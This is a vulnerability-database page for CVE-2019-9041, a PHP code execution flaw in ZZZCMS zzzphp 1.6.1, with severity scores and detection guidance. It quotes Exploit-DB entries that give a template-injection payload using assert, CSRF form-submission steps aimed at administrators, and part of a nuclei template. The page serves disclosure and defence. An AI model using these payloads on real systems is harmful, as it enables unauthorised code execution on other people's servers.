CVE-2019-9041
published 2019-02-23CVE-2019-9041: An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP…
PriorityP258high7.2CVSS 3.0
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
31.42%
98.1th percentile
An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zzzcms | zzzphp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
sigma
matchers: - type: dsl dsl: - 'status_code_2 == 200' - '!contains(body_1, "phpinfo")' - 'contains_all(body_2, "phpinfo","PHP Version")' condition: and
- →Detect the 'if:assert' substring in HTTP request bodies or template files, as this is the specific bypass pattern exploiting the weak filtering in parserIfLabel(). ↗
- →Monitor for CSRF-based POST requests that write template content containing '{if:' blocks to the ZZZCMS admin panel template editor, which can chain into RCE without direct admin credentials. ↗
- →Flag responses to POST /search/ that contain both 'phpinfo' and 'PHP Version' in the body, as this indicates successful code execution via the template injection vulnerability. ↗
- →Inspect template files (e.g., search.html) in ZZZCMS installations for the presence of '{if:assert(...)}{end if}' or similar dynamic PHP evaluation constructs injected by an attacker. ↗
- ·The RCE exploit (CVE-2019-9041) in its basic form requires authenticated access to the admin panel to edit templates; however, it can be chained with the CSRF vulnerability (CVE-2019-9082) to achieve unauthenticated exploitation. ↗
- ·The vulnerability affects ZZZCMS zzzphp version 1.6.1 specifically; the nuclei template targets POST /search/ with Content-Type: application/x-www-form-urlencoded and requires two sequential requests to confirm exploitation. ↗
- ·The vulnerability is confirmed to affect both Windows and Linux environments running IIS or Apache web servers. ↗
CVSS provenance
nvdv3.07.2HIGHCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
zzzphp CMS 1.6.1 - Cross-Site Request Forgery
exploitdb·2019-03-04·CVSS 7.2
CVE-2019-9082 [HIGH] zzzphp CMS 1.6.1 - Cross-Site Request Forgery
zzzphp CMS 1.6.1 - Cross-Site Request Forgery
---
# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 26/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9082
Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.
Exploit:
history.pushState('', '', '/')
document.forms[0].submit();
Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and
Exploit-DB
zzzphp CMS 1.6.1 - Remote Code Execution
exploitdb·2019-02-25·CVSS 7.2
CVE-2019-9041 [HIGH] zzzphp CMS 1.6.1 - Remote Code Execution
zzzphp CMS 1.6.1 - Remote Code Execution
---
# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 24/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9041
Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation.
Exploit:
login in to the admin panel, edit the template of search.html, insert the following code:
{if:assert($_POST[x])}phpinfo();{end if}
Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute
Nuclei
ZZZCMS 1.6.1 - Remote Code Execution
nuclei·CVSS 7.2
CVE-2019-9041 [HIGH] ZZZCMS 1.6.1 - Remote Code Execution
ZZZCMS 1.6.1 - Remote Code Execution
ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
Template:
id: CVE-2019-9041
info:
name: ZZZCMS 1.6.1 - Remote Code Execution
author: pikpikcu
severity: high
description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest securit
2019-02-23
Published